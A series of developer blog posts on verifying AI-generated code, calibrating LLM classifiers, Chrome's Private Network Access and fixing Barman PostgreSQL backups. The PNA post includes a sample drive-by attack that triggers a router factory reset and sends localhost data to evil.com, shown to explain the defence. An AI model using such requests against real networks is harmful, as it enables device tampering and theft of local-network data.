on_progress is not a real parameter on pd.read_csv. The code was syntactically valid Python, my linter didn't complain, and the failure mode was... silent. The kwarg got swallowed and the import ran without any progress reporting. I only noticed because a user pinged me saying the loading bar wasn't moving.

This is the core issue. AI-generated code is plausible in a specific, dangerous way: it pattern-matches the shape of real APIs, which is exactly what makes it hard to spot in review.

Root Cause: How Hallucinations Slip Through

Three things conspire here:

Pattern-matching beats correctness. The model has seen thousands of pd.read_csv calls. It has also seen progress callbacks on other I/O functions. Stitching them together produces code that looks right without being right.
Type checkers often can't save you. Many libraries use **kwargs, dynamic dispatch, or duck typing. Static analysis won't flag a non-existent keyword argument that flows through **kwargs.
Reviewer fatigue. When the surrounding code is correct and the function name is real, your eyes glide over the made-up parameter. After 200 lines of mostly-good output, you stop reading carefully.
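
The **kwargs point is easy to see in miniature. In the sketch below, strict_reader and lenient_reader are made-up stand-ins (not pandas functions), and accepts_kwarg is a hypothetical helper built on inspect.signature that tells you whether a keyword is actually declared.

```python
import inspect


def accepts_kwarg(func, name):
    """True if `func` declares a parameter called `name`; a bare **kwargs does not count."""
    param = inspect.signature(func).parameters.get(name)
    return param is not None and param.kind in (
        inspect.Parameter.POSITIONAL_OR_KEYWORD,
        inspect.Parameter.KEYWORD_ONLY,
    )


def strict_reader(path, chunksize=None):
    """Explicit signature: an unknown keyword raises TypeError at call time."""
    return path


def lenient_reader(path, **options):
    """Catch-all signature: an unknown keyword is accepted and silently ignored."""
    return path


print(accepts_kwarg(strict_reader, "chunksize"))     # True
print(accepts_kwarg(lenient_reader, "on_progress"))  # False, yet the call would succeed
```

inspect.signature can raise ValueError for some builtins implemented in C, so treat a failure there as "go read the docs" rather than as a verdict either way.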

The deeper issue is a workflow one. If you're prompting for a feature and pasting the result, you've outsourced generation but kept full responsibility for verification — and verification is harder on code you didn't write, because you don't have the mental model the author would have.

The Fix: Force Verification Into the Loop

Here's the workflow I switched to after enough of these bites. The core idea: don't accept code unless something other than your eyes has touched it.

Step 1: Generate the test first

Before generating the implementation, write (or generate) a test that exercises the specific behavior you want. This pins the behavior to something runnable.

# tests/test_import.py
from myapp.importer import load_users

def test_load_users_reports_progress():
    progress_log = []

    # The whole point of the feature: progress callbacks fire
    result = load_users(
        "tests/fixtures/users.csv",
        on_progress=lambda pct: progress_log.append(pct),
    )

    assert len(result) > 0
    assert progress_log, "expected at least one progress update"
    assert progress_log[-1] == 100

If the implementation hallucinates an API, the test fails immediately with a real error message, usually a TypeError saying the function got an unexpected keyword argument. Way cheaper than debugging in production.
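
For comparison, here is one implementation that would satisfy that test using only the standard library. It is a sketch, not the importer from my project: it makes two passes over the file (one to count rows, one to parse) and assumes no quoted field contains a newline, so that line count equals row count.

```python
import csv
from typing import Callable, List, Optional


def load_users(path: str, on_progress: Optional[Callable[[int], None]] = None) -> List[dict]:
    """Read a CSV into a list of dicts, reporting integer percent progress."""
    # First pass: count data rows so progress has a denominator.
    with open(path, newline="", encoding="utf-8") as f:
        total = max(sum(1 for _ in f) - 1, 0)  # minus the header line

    rows = []
    last_pct = -1
    with open(path, newline="", encoding="utf-8") as f:
        for i, row in enumerate(csv.DictReader(f), start=1):
            rows.append(row)
            pct = min(i * 100 // total, 100) if total else 100
            # Only report when the integer percentage actually changes.
            if on_progress and pct != last_pct:
                on_progress(pct)
                last_pct = pct
    if on_progress and last_pct != 100:
        on_progress(100)  # empty file or skipped blank lines: still signal completion
    return rows
```

The callback here is a real parameter on a function you own, which is the difference that matters: the progress reporting lives in code the test can exercise.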

Step 2: Run code, don't just read it

Add a pre-commit hook that blocks commits when tests fail. Yes, this is obvious. Yes, most teams I've worked with don't actually enforce it.

# .pre-commit-config.yaml
repos:
  - repo: local
    hooks:
      - id: pytest-fast
        name: pytest (fast suite)
        entry: pytest -x -m "not slow"  # -x: stop on first failure
        language: system
        pass_filenames: false
        always_run: true

The point isn't catching every bug. It's catching the plausible-but-wrong ones the moment they hit your branch, before they pile up into a multi-hour debugging session two weeks later.

Step 3: Pin the dependency surface

A surprising amount of hallucination happens because the model assumes a different version of a library than you have installed. Lock your versions and tell the assistant which version you're on:

# pyproject.toml
[project]
dependencies = [
    "pandas==2.2.3",    # exact pin, not >=
    "pydantic==2.9.2",
]

When you prompt, include the version. "Using pandas 2.2.3, write a CSV importer with progress reporting" gets you closer to reality than the same prompt without the version, because the model will at least try to constrain its API recall.
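
Typing versions into prompts by hand drifts out of date quickly, so it can be generated from the environment instead. A small sketch using importlib.metadata from the standard library (Python 3.8+); version_preamble is a hypothetical helper name.

```python
from importlib.metadata import PackageNotFoundError, version
from typing import List


def version_preamble(packages: List[str]) -> str:
    """Build a 'Using pkg X.Y.Z' line from what is actually installed."""
    parts = []
    for name in packages:
        try:
            parts.append(f"{name} {version(name)}")
        except PackageNotFoundError:
            # Say so explicitly rather than letting the model guess a version.
            parts.append(f"{name} (not installed)")
    return "Using " + ", ".join(parts) + "."
```

Prepending version_preamble(["pandas", "pydantic"]) to the prompt keeps the stated versions in sync with the lock file without anyone having to remember to update them.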

Step 4: Prefer narrow prompts over broad ones

Long, multi-feature prompts produce code where errors compound. I get better results asking for one function at a time, with clear inputs and outputs:

Function signature:
    def parse_user_row(row: dict) -> User: ...

Requirements:
- Strip whitespace from email
- Reject rows where email is missing or invalid
- Return User(email=..., name=..., created_at=...)
- Raise InvalidRowError on bad data, do not log

Use only the standard library and pydantic 2.9.

Narrow scope, explicit constraints, named version. My hallucination rate drops noticeably with this format.

Prevention: Build Habits, Not Heroics

A few things I now do reflexively:

Read the imports first. If the generated code imports something you didn't ask for, that's a yellow flag. Verify the import path exists in your installed version before reading further.
Distrust convenience parameters. When a function call has a kwarg that feels suspiciously just right for your problem, look it up in the docs. That's the highest-probability hallucination spot.
Treat "looks correct" as a smell. If you read 30 lines of generated code and have zero questions, you didn't read carefully. There should always be at least one thing to verify.
Keep your test runtime fast. If your full suite takes eight minutes, you'll skip running it. Sub-30-second feedback loops are what actually keep this workflow honest.

So, More Work or Less?

After two years, my honest answer is: roughly the same amount of work, but distributed differently. Less typing, more reading. Less greenfield design, more verification. The people I see losing time to AI tools are the ones who didn't shift the verification load anywhere — they just trusted the output and inherited a slower debugging tail.

The tooling won't fix this for you. The workflow will.

Why Your LLM Classification Pipeline Fails on Edge Cases (and How to Fix It)

Alan West — Mon, 04 May 2026 00:41:21 GMT

A Harvard study recently made waves: OpenAI's o1 model reportedly diagnosed 67% of emergency room patients correctly, compared to 50-55% accuracy from triage doctors. Whether or not that number holds up under scrutiny, it highlights something developers building AI classification systems already know — LLMs can be surprisingly good at pattern matching across messy, unstructured input.

But here's the part nobody's tweeting about: getting an LLM to perform well in a research setting and getting it to perform reliably in a production pipeline are two completely different problems.

I've spent the last year building classification systems that use LLMs for intake processing, risk scoring, and routing decisions. The accuracy numbers looked great in testing. Then production traffic hit, and things got weird fast.

Let me walk you through the failure modes I encountered and how I fixed each one.

The Core Problem: Inconsistent Output on Ambiguous Input

Here's the scenario. You've got an LLM classifying incoming data into categories — could be support tickets, insurance claims, medical symptoms, whatever. Your eval set shows 85% accuracy. You ship it.

Within a week, you notice:

The same input produces different classifications on retry
Edge cases get confidently wrong answers (no hedging, no uncertainty)
The model hallucinates categories that don't exist in your schema

Sound familiar? The root cause is almost always the same: you're treating a probabilistic text generator like a deterministic function.

Step 1: Lock Down Your Output Schema

The first fix is embarrassingly simple. Stop accepting free-text classification output.

import json
from enum import Enum

from pydantic import BaseModel, Field

class TriageCategory(str, Enum):
    CRITICAL = "critical"
    URGENT = "urgent"
    STANDARD = "standard"
    LOW = "low"

class ClassificationError(Exception):
    """Raised when model output cannot be parsed into a ClassificationResult."""

class ClassificationResult(BaseModel):
    category: TriageCategory
    confidence: float = Field(ge=0.0, le=1.0)
    reasoning: str = Field(max_length=500)
    # Lets the model flag when it's unsure
    ambiguous: bool = False
    differential: list[TriageCategory] = Field(default_factory=list)  # other possible categories

def validate_classification(raw_output: str) -> ClassificationResult:
    try:
        data = json.loads(raw_output)
        return ClassificationResult(**data)
    except (json.JSONDecodeError, TypeError, ValueError) as e:
        # TypeError covers valid JSON that is not an object (e.g. a list);
        # pydantic's ValidationError is a ValueError subclass.
        # Don't silently fall back; route to human review
        raise ClassificationError(f"Model output failed validation: {e}") from e

The differential field is the key insight I stole from actual medical practice. When doctors aren't sure, they don't just pick one answer — they list the possibilities. Your model should do the same.

If you're using an API that supports structured outputs or function calling, use that instead of parsing raw text. It eliminates an entire class of formatting errors.

Step 2: Calibrate Confidence Scores (They're Lying to You)

Here's something that bit me hard. When you ask an LLM to self-report confidence, those numbers are essentially made up. A model that says it's 95% confident is not actually right 95% of the time.

import numpy as np
from collections import defaultdict

class ConfidenceCalibrator:
    """Post-hoc calibration using historical predictions vs. outcomes."""

    def __init__(self, n_bins: int = 10):
        self.n_bins = n_bins
        self.bin_boundaries = np.linspace(0, 1, n_bins + 1)
        self.calibration_map: dict[int, float] = {}

    def fit(self, predicted_confidences: list[float], actual_correct: list[bool]):
        """Build calibration curve from labeled evaluation data."""
        bins = defaultdict(list)

        for conf, correct in zip(predicted_confidences, actual_correct):
            bin_idx = int(np.digitize(conf, self.bin_boundaries)) - 1
            bin_idx = min(bin_idx, self.n_bins - 1)
            bins[bin_idx].append(correct)

        for bin_idx, outcomes in bins.items():
            # Actual accuracy for this confidence range
            self.calibration_map[bin_idx] = sum(outcomes) / len(outcomes)

    def calibrate(self, raw_confidence: float) -> float:
        """Map model's claimed confidence to actual observed accuracy."""
        bin_idx = int(np.digitize(raw_confidence, self.bin_boundaries)) - 1
        bin_idx = min(bin_idx, self.n_bins - 1)
        return self.calibration_map.get(bin_idx, raw_confidence)

In my experience, LLMs are consistently overconfident in the 0.7-0.9 range. After calibration, a lot of those "85% confident" predictions turned out to be correct about 60% of the time. That's a massive difference when you're routing decisions based on those numbers.
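
To put a number on that gap before and after calibration, one option is expected calibration error (ECE): the average distance between claimed confidence and observed accuracy, weighted by how many predictions land in each bin. The sketch below uses only the standard library. The function name and the equal-width binning are my choices for illustration, not part of the calibrator above.

```python
def expected_calibration_error(confidences, correct, n_bins=10):
    """Weighted average of |accuracy - mean confidence| over equal-width bins."""
    if len(confidences) != len(correct):
        raise ValueError("confidences and correct must have the same length")
    if not confidences:
        return 0.0

    bins = [[] for _ in range(n_bins)]
    for conf, ok in zip(confidences, correct):
        # Clamp so that conf == 1.0 lands in the last bin
        idx = min(int(conf * n_bins), n_bins - 1)
        bins[idx].append((conf, ok))

    total = len(confidences)
    ece = 0.0
    for members in bins:
        if not members:
            continue
        mean_conf = sum(c for c, _ in members) / len(members)
        accuracy = sum(1 for _, ok in members if ok) / len(members)
        ece += (len(members) / total) * abs(accuracy - mean_conf)
    return ece


# Ten predictions at a claimed 0.85, six of them actually correct
claimed = [0.85] * 10
outcomes = [True] * 6 + [False] * 4
print(round(expected_calibration_error(claimed, outcomes), 2))  # 0.25
```

An ECE near zero means the confidence numbers can be taken roughly at face value. Computing it on raw and on calibrated scores shows whether the calibration step is earning its keep.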

Step 3: Build a Human-in-the-Loop Escalation Path

This is where most teams cut corners, and it's where the Harvard study comparison gets interesting. The study compared AI-only vs. doctor-only. But in practice, the winning architecture is neither — it's AI + human with clear escalation rules.

class EscalationRouter:
    def __init__(self, calibrator: ConfidenceCalibrator, 
                 auto_threshold: float = 0.85,
                 reject_threshold: float = 0.5):
        self.calibrator = calibrator
        self.auto_threshold = auto_threshold
        self.reject_threshold = reject_threshold

    def route(self, result: ClassificationResult) -> str:
        calibrated = self.calibrator.calibrate(result.confidence)

        # High confidence + no ambiguity = auto-process
        if calibrated >= self.auto_threshold and not result.ambiguous:
            return "auto_accept"

        # Model flagged ambiguity or differential has close alternatives
        if result.ambiguous or len(result.differential) > 1:
            return "human_review_priority"

        # Low confidence = don't even try
        if calibrated < self.reject_threshold:
            return "human_review_required"

        # Middle ground: accept but flag for async audit
        return "auto_accept_with_audit"

The auto_accept_with_audit path is crucial. It lets you process the majority of clear-cut cases automatically while building a feedback dataset from the audited ones. After a few weeks, you've got labeled data to retrain your calibration curve.

Step 4: Use Eval-Driven Development, Not Vibes

The reason that Harvard study is useful isn't the headline number — it's that they had a clear evaluation methodology. Your classification system needs the same thing.

from collections import Counter

def run_eval_suite(classify_fn, test_cases: list[dict]) -> dict:
    results = {
        "total": len(test_cases),
        "correct": 0,
        "incorrect_but_flagged": 0,  # wrong, but model said ambiguous
        "incorrect_confident": 0,    # wrong AND confident — the scary ones
        "consistency": []             # same input, multiple runs
    }

    for case in test_cases:
        # Run each case 3 times to check consistency
        outputs = [classify_fn(case["input"]) for _ in range(3)]
        categories = [o.category for o in outputs]

        results["consistency"].append(len(set(categories)) == 1)

        # Use majority vote for accuracy check
        majority = Counter(categories).most_common(1)[0][0]

        if majority == case["expected"]:
            results["correct"] += 1
        elif any(o.ambiguous for o in outputs):
            results["incorrect_but_flagged"] += 1
        else:
            results["incorrect_confident"] += 1

    results["consistency_rate"] = sum(results["consistency"]) / len(results["consistency"])
    return results

The metric I care about most isn't overall accuracy — it's incorrect_confident. That's the failure mode that causes real damage. A system that's wrong 20% of the time but flags uncertainty is infinitely more useful than one that's wrong 15% of the time but never tells you.

Prevention: The Production Checklist

Before you ship any LLM classification pipeline to production:

Structured output validation — never trust raw text parsing for critical paths
Calibrated confidence — run at least 200 labeled examples through calibration before going live
Escalation routing — define explicit thresholds for auto-accept, audit, and human-review
Consistency testing — if the same input gives different outputs on retry, your temperature is too high or your prompt is ambiguous
Eval suite in CI — run your test cases on every prompt change, every model version bump
Monitoring in production — track confidence distribution drift over time. If your model suddenly gets more confident or less confident across the board, something changed
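
For the monitoring item, a cheap first signal is the shift in mean confidence between a baseline window and recent traffic. This is a minimal sketch using only the standard library. The function name and the 0.1 tolerance are placeholder assumptions, and a real deployment would likely compare full distributions rather than just means.

```python
from statistics import mean

def confidence_drift(baseline, recent, tolerance=0.1):
    """Return (shift, drifted) comparing mean confidence of two windows."""
    if not baseline or not recent:
        raise ValueError("both windows need at least one confidence value")
    shift = mean(recent) - mean(baseline)
    return shift, abs(shift) > tolerance


# Hypothetical calibrated confidences from two different weeks
baseline_week = [0.62, 0.71, 0.80, 0.75, 0.68]
this_week = [0.91, 0.94, 0.89, 0.93, 0.90]

shift, drifted = confidence_drift(baseline_week, this_week)
print(f"shift={shift:+.2f} drifted={drifted}")
```

A sudden jump like this one usually points at a prompt change, a model version bump, or a shift in the incoming data, all of which are worth investigating before trusting the auto-accept path.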

The Bigger Picture

The headline "AI beats doctors" is reductive. What the research actually suggests is that LLMs are good at synthesizing patterns across large amounts of unstructured text — which is literally what they were built to do.

The developer takeaway isn't "replace humans with LLMs." It's that a well-built classification pipeline with proper calibration, structured outputs, and human escalation can outperform either humans or AI working alone.

Build the pipeline right, measure it honestly, and don't trust the confidence scores until you've calibrated them. That's it. That's the whole thing.

Why Every Website Wants to Access Your Local Network (And What to Do About It)

Alan West — Sun, 03 May 2026 20:42:28 GMT

If you've been browsing the web recently, you've probably noticed a new kind of permission prompt popping up: "This site wants to access devices on your local network." It showed up for me on a random dashboard I was building, and my first thought was — wait, I wrote this app, why is the browser asking me this?

Turns out, this is Chrome's rollout of Private Network Access (PNA), and it's changing how web apps interact with local resources. If you're a developer who builds anything that talks to localhost, IoT devices, printers, or internal APIs, you need to understand this.

What's Actually Happening

Private Network Access is a security specification (formerly known as CORS-RFC1918) that prevents public websites from silently making requests to resources on your private or local network. The browser now classifies all network destinations into three buckets:

Public — any globally routable IP address
Private — RFC 1918 ranges like 10.x.x.x, 172.16.x.x–172.31.x.x, 192.168.x.x
Local — localhost / 127.0.0.1 / ::1

The rule is simple: requests from a less private context to a more private context get blocked unless explicitly allowed. A page served from a public server can't just silently hit 192.168.1.1 anymore.
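
The "less private to more private" rule can be sketched in a few lines of Python. This is an approximation for illustration only: the function names are mine, and Python's ipaddress module treats a few more ranges as private than the three RFC 1918 blocks listed above, so it will not match a browser's classification exactly.

```python
import ipaddress

# Higher number = more private
PRIVACY_RANK = {"public": 0, "private": 1, "local": 2}

def address_space(host_ip):
    """Classify an IP address string as 'public', 'private', or 'local'."""
    ip = ipaddress.ip_address(host_ip)
    if ip.is_loopback:
        return "local"
    if ip.is_private or ip.is_link_local:
        return "private"
    return "public"

def needs_pna_check(initiator_ip, target_ip):
    """True when the request goes from a less private to a more private space."""
    return PRIVACY_RANK[address_space(target_ip)] > PRIVACY_RANK[address_space(initiator_ip)]


print(needs_pna_check("8.8.8.8", "192.168.1.1"))       # True: public -> private
print(needs_pna_check("192.168.1.10", "192.168.1.1"))  # False: private -> private
print(needs_pna_check("192.168.1.10", "127.0.0.1"))    # True: private -> local
```

Note that the classification is about where the page was served from and where the request is going, not about where the user happens to be sitting.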

Why This Exists (And Why It's a Good Thing)

For years, attackers have exploited the trust relationship between your browser and your local network. A malicious website could fire off requests to your router's admin panel, poke at internal company APIs, or scan for IoT devices — all without you knowing.

The classic attack looks something like this:


<img src="http://192.168.1.1/admin/factory_reset" />


<script>
  // Scan common local ports to fingerprint internal services
  fetch('http://localhost:8080/api/health')
    .then(r => r.json())
    .then(data => {
      // Exfiltrate info about what's running locally
      navigator.sendBeacon('https://evil.com/collect', JSON.stringify(data));
    })
    .catch(() => {}); // silently fail, try next port
</script>

DNS rebinding attacks are even nastier: an attacker's domain resolves to their server initially, then switches to 127.0.0.1 after the page loads, bypassing the same-origin policy. PNA closes this hole in the browser, because the check is based on the IP address the request actually connects to rather than on the hostname.

How It Works Under the Hood

When your page tries to make a request from a public context to a private/local address, Chrome now sends a CORS preflight with a special header:

OPTIONS /api/data HTTP/1.1
Host: 192.168.1.50:3000
Origin: https://myapp.example.com
Access-Control-Request-Method: GET
Access-Control-Request-Private-Network: true

Your local server needs to respond with:

HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://myapp.example.com
Access-Control-Allow-Private-Network: true

If the server doesn't include Access-Control-Allow-Private-Network: true in the preflight response, the browser blocks the actual request. No negotiation, no fallback.
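
The server-side decision can be written as a small pure function, independent of any web framework. This is a sketch under assumptions: the function name and the explicit origin allowlist are mine, and the method list is just an example.

```python
def pna_preflight_headers(request_headers, allowed_origins):
    """Return response headers for a preflight, or None to refuse it."""
    # HTTP header names are case-insensitive
    headers = {k.lower(): v for k, v in request_headers.items()}
    origin = headers.get("origin")
    if origin not in allowed_origins:
        return None

    response = {
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Methods": "GET, POST, PUT, DELETE",
        "Vary": "Origin",
    }
    # Only opt in to private-network access when the browser asked for it
    if headers.get("access-control-request-private-network") == "true":
        response["Access-Control-Allow-Private-Network"] = "true"
    return response


preflight = {
    "Origin": "https://myapp.example.com",
    "Access-Control-Request-Method": "GET",
    "Access-Control-Request-Private-Network": "true",
}
print(pna_preflight_headers(preflight, {"https://myapp.example.com"}))
print(pna_preflight_headers(preflight, {"https://other.example.com"}))  # None
```

Checking the origin against an allowlist, rather than echoing back whatever arrives, keeps the opt-in limited to the sites you actually intend to talk to your local service.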

Fixing It for Your Dev Environment

This is where most developers first run into PNA — your frontend is served from a deployed domain (or even a local dev server on one port) and it's trying to hit an API on another local port. Here's how to handle it.

Option 1: Add the PNA Headers to Your Server

If you control the local server, add the proper CORS preflight handling. Here's an example with Express:

const express = require('express');
const app = express();

app.use((req, res, next) => {
  // Handle the PNA preflight
  if (req.method === 'OPTIONS') {
    res.setHeader('Access-Control-Allow-Origin', req.headers.origin || '*');
    res.setHeader('Access-Control-Allow-Methods', 'GET, POST, PUT, DELETE');
    res.setHeader('Access-Control-Allow-Headers', 'Content-Type, Authorization');

    // This is the key header for Private Network Access
    res.setHeader('Access-Control-Allow-Private-Network', 'true');

    return res.status(200).end();
  }

  res.setHeader('Access-Control-Allow-Origin', req.headers.origin || '*');
  next();
});

app.get('/api/data', (req, res) => {
  res.json({ status: 'ok' });
});

app.listen(3000);

Option 2: Use a Reverse Proxy

If you don't control the local service (like a printer interface or an IoT device), you can proxy through your own backend. This keeps everything within the same origin and avoids the PNA check entirely.

# nginx.conf — proxy local device through your server
server {
    listen 443 ssl;
    server_name myapp.example.com;

    location /api/local-device/ {
        # Forward to the device on the local network
        proxy_pass http://192.168.1.50:8080/;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
    }
}

Now your frontend hits https://myapp.example.com/api/local-device/status and the proxy handles the local network hop server-side. No browser permission prompt, no PNA preflight.

Option 3: Serve Everything from the Same Private Context

If both your frontend and API are on the local network, serve them from the same origin. Private-to-private requests within the same address space don't trigger PNA checks.

# Serve your frontend from the same local server
# Instead of: frontend on myapp.com hitting localhost:3000
# Do: frontend AND api both on localhost:3000
npx serve ./dist -l 3000

Common Gotchas

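Mixed content matters. If your page is served over HTTPS, mixed-content rules apply on top of PNA. A secure public page requesting a plain-HTTP private address (http://192.168.1.50:...) is typically blocked as mixed content no matter which PNA headers the device sends. Loopback addresses such as http://localhost are generally treated as potentially trustworthy and so escape that particular block, but they still go through the PNA check.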

WebSockets are affected too. PNA applies to WebSocket connections. If your app opens a WebSocket to a local device, the same preflight rules apply — though the handshake mechanism differs slightly from standard CORS preflights.

Chrome flags for testing. During development, you can temporarily disable this check to unblock yourself:

chrome://flags/#block-insecure-private-network-requests

Set it to "Disabled" and restart. But don't ship instructions telling users to do this — that defeats the entire security model.

What About Other Browsers?

Chrome is leading this rollout, but the spec is a W3C community effort under the WICG. Firefox and Safari have shown interest but haven't fully implemented the permission prompt yet as of early 2025. Expect this to become standard across all browsers eventually.

Prevention: Design for PNA from the Start

If you're building anything that needs local network access:

Architect with a proxy layer. Don't assume the browser can directly reach local resources from a public origin. Route through your backend.
Add PNA headers to every local service you build. Make Access-Control-Allow-Private-Network: true part of your CORS middleware from day one.
Use HTTPS everywhere, even locally. Tools like mkcert make it easy to get trusted local certificates.
Test with PNA enabled. Don't rely on Chrome flags being off. Test the real user experience.

PNA might feel annoying when you first hit it, but it's closing a real class of vulnerabilities that's been open for decades. A few headers and some thoughtful architecture is a small price for keeping your users' local networks safe from drive-by attacks.

Why Your Barman Backups Keep Failing (And How to Actually Fix It)

Alan West — Sun, 03 May 2026 18:55:06 GMT

So you finally set up Barman to handle your PostgreSQL backups. You followed the docs, configured your server, ran barman check and... a wall of FAILED messages stares back at you. Cool. Very reassuring for your disaster recovery strategy.

I've been through this exact pain on multiple projects. Barman is genuinely excellent backup tooling for PostgreSQL, but the initial setup has several moving parts that all need to work together. Let me walk you through the most common failures and how to systematically fix each one.

The Symptom: `barman check` Looks Like a Crime Scene

Here's what a broken Barman setup typically looks like:

$ barman check mydb
Server mydb:
    PostgreSQL: OK
    is_superuser: OK
    PostgreSQL streaming: FAILED
    WAL archive: FAILED (no WAL file archived yet)
    replication slot: FAILED (slot not found)
    SSH: FAILED
    backup maximum age: FAILED
    compression settings: OK

Five failures. Each one blocks the next. The trick is knowing the correct order to fix them, because they're actually a dependency chain.

Root Cause 1: SSH Isn't Configured Both Ways

This catches everyone. Barman needs passwordless SSH in both directions — from the barman OS user to the postgres OS user on the database host, AND from postgres back to barman. Most people only set up one direction.

# On the Barman host, as the barman user
ssh-keygen -t ed25519 -N '' -f ~/.ssh/id_ed25519
ssh-copy-id postgres@your-db-host

# On the DB host, as the postgres user
ssh-keygen -t ed25519 -N '' -f ~/.ssh/id_ed25519
ssh-copy-id barman@your-barman-host

Verify both directions actually work without a password prompt:

# From barman host
sudo -u barman ssh postgres@your-db-host "echo ok"

# From db host
sudo -u postgres ssh barman@your-barman-host "echo ok"

If either one asks for a password, your backups won't work. Period. Check ~/.ssh/authorized_keys permissions — SSH is picky about this. The .ssh directory needs 700 and the authorized_keys file needs 600.
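
If you want to script that permission check, here is a minimal sketch in Python. The function name is hypothetical, and it simply tests for the exact 700 and 600 modes mentioned above on whichever directory you point it at.

```python
import os
import stat

def ssh_permission_problems(ssh_dir):
    """Return a list of human-readable permission problems (empty if fine)."""
    expected = {
        ssh_dir: 0o700,
        os.path.join(ssh_dir, "authorized_keys"): 0o600,
    }
    problems = []
    for path, want in expected.items():
        if not os.path.exists(path):
            problems.append(f"{path} is missing")
            continue
        mode = stat.S_IMODE(os.stat(path).st_mode)
        if mode != want:
            problems.append(f"{path} has mode {mode:o}, expected {want:o}")
    return problems


# Run as the barman or postgres user to inspect that user's own ~/.ssh
for problem in ssh_permission_problems(os.path.expanduser("~/.ssh")):
    print(problem)
```

Run it on both hosts, once per user, since a wrong mode on either side is enough to bring the password prompt back.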

Root Cause 2: WAL Archiving Isn't Actually Enabled

Barman relies on receiving WAL (Write-Ahead Log) files from PostgreSQL to enable point-in-time recovery. There are two ways to get WAL to Barman, and mixing them up is a classic source of confusion.

Method 1: archive_command (push model)

PostgreSQL pushes WAL files to Barman via SSH. You need to configure this in postgresql.conf:

# postgresql.conf on the database server
archive_mode = on
archive_command = 'barman-wal-archive your-barman-host mydb %p'

# Requires barman-cli package installed on the DB host

The gotcha here: archive_mode requires a full server restart, not just a reload. I've lost an embarrassing amount of time wondering why archive_command wasn't firing, only to realize archive_mode was still off because I only did pg_ctl reload.

Method 2: Streaming via pg_receivewal (pull model)

Barman pulls WAL using PostgreSQL's streaming replication protocol. This is more reliable and my preferred approach. In your Barman server config:

# /etc/barman.d/mydb.conf
[mydb]
description = "Production DB"
conninfo = host=your-db-host user=barman dbname=postgres
streaming_conninfo = host=your-db-host user=streaming_barman
backup_method = postgres
streaming_archiver = on
replication_slot_name = barman

You can actually run both methods simultaneously for redundancy, which is what I do in production. Belt and suspenders.

Root Cause 3: The Replication Slot Doesn't Exist Yet

If you set replication_slot_name in the config (and you should, to prevent WAL files from being recycled before Barman grabs them), you need to explicitly create it:

# Create the replication slot
barman receive-wal --create-slot mydb

# Then start the WAL receiver
barman receive-wal mydb

A warning here: if a replication slot exists but Barman isn't consuming from it, PostgreSQL will keep every WAL file forever. I've seen this fill up a production disk at 3 AM. Not fun. Monitor your replication slot lag.

You can check the slot status from PostgreSQL directly:

SELECT slot_name, active, restart_lsn,
       pg_wal_lsn_diff(pg_current_wal_lsn(), restart_lsn) AS lag_bytes
FROM pg_replication_slots
WHERE slot_name = 'barman';
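
To turn that query into an alert, something like the following sketch could sit in a monitoring script. It deliberately leaves out the database call: it assumes you have already fetched the rows with whatever PostgreSQL driver you use. The function name and the 1 GiB threshold are arbitrary placeholders.

```python
def slot_alerts(rows, max_lag_bytes=1024**3):
    """rows: (slot_name, active, restart_lsn, lag_bytes) tuples from the query."""
    alerts = []
    for slot_name, active, _restart_lsn, lag_bytes in rows:
        if not active:
            alerts.append(f"{slot_name}: slot is inactive, WAL is being retained")
        if lag_bytes is not None and lag_bytes > max_lag_bytes:
            alerts.append(f"{slot_name}: lag is {lag_bytes / 1024**2:.0f} MiB")
    return alerts


# Hypothetical result row: slot exists, nothing is consuming it, 5 GiB behind
rows = [("barman", False, "0/5000000", 5 * 1024**3)]
for alert in slot_alerts(rows):
    print(alert)
```

An inactive slot is worth alerting on even when the lag is still small, because that is exactly the state that ends with a full disk.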

Root Cause 4: The Cron Job Is Missing

This is the sneaky one. Barman doesn't run as a daemon. It relies on barman cron being executed regularly — typically every minute — to perform WAL archiving, manage pg_receivewal processes, and enforce retention policies.

# Add to the barman user's crontab
sudo -u barman crontab -e

# Add this line:
* * * * * /usr/bin/barman cron

Without this, pg_receivewal won't start, WAL files won't be processed from the incoming directory, and old backups will pile up ignoring your retention policy. I've audited setups where everything was configured perfectly but nobody added the cron entry. barman check just silently showed failures.

The Fix: A Systematic Checklist

Here's the order I follow every time I set up Barman on a new server:

Install Barman on the backup host and barman-cli on the database host
Set up bidirectional SSH between the barman and postgres users
Configure the PostgreSQL side — archive_mode, WAL level, connection permissions in pg_hba.conf
Create the Barman server config in /etc/barman.d/
Create the replication slot: barman receive-wal --create-slot mydb
Set up the cron job for barman cron
Force a WAL switch to verify the pipeline: barman switch-wal mydb
Run barman check — everything should be green now
Take your first backup: barman backup mydb

Prevention: Don't Wait for Disaster

Once everything is green, set up monitoring. A few things to watch:

Run barman check in your monitoring system — it returns non-zero exit codes on failure, so it plugs into Nagios, Prometheus exporters, or a simple cron-based alerting script
Set a retention policy so old backups get cleaned up automatically:

# In your server config
retention_policy = RECOVERY WINDOW OF 7 DAYS

Test recovery regularly. A backup you've never restored is a backup you don't have. Schedule a monthly test restore to a scratch server:

# Restore latest backup to a temporary location
barman recover mydb latest /tmp/pg_restore_test \
  --remote-ssh-command "ssh postgres@test-host"

Monitor replication slot lag to catch the disk-filling scenario I mentioned earlier
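
The "simple cron-based alerting script" from the first item could look roughly like this. It relies only on the exit code behaviour described above. The function names are mine, and printing to stderr stands in for whatever alert channel you actually use.

```python
import subprocess
import sys

def run_check(command):
    """Run a check command; return (ok, combined output)."""
    try:
        proc = subprocess.run(command, capture_output=True, text=True)
    except FileNotFoundError:
        return False, f"command not found: {command[0]}"
    return proc.returncode == 0, (proc.stdout + proc.stderr).strip()

def alert_if_failing(server):
    """Run 'barman check <server>' and report failures on stderr."""
    ok, output = run_check(["barman", "check", server])
    if not ok:
        # Replace this print with email, Slack, PagerDuty, etc.
        print(f"barman check {server} failed:\n{output}", file=sys.stderr)
    return ok
```

Calling alert_if_failing("mydb") from a script in the barman user's crontab, separate from the barman cron entry, gives you a basic health signal without any extra infrastructure.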

Wrapping Up

Barman's initial setup friction is real, but it's a one-time cost. Once it's running, it's genuinely solid tooling — I've relied on it across multiple production Postgres deployments and it's saved me more than once during actual incidents.

The key insight is that most Barman failures aren't Barman problems. They're SSH permission issues, PostgreSQL configuration oversights, or missing cron entries. Fix the foundation and Barman just works.

If barman check is still showing failures after going through all of this, the official Barman documentation is thorough and well-organized. The barman diagnose command is also your friend — it dumps the full configuration and system state into a format you can paste into a GitHub issue if you're truly stuck.

AI Coding Has Its Own Language Now — Here's How to Decode It

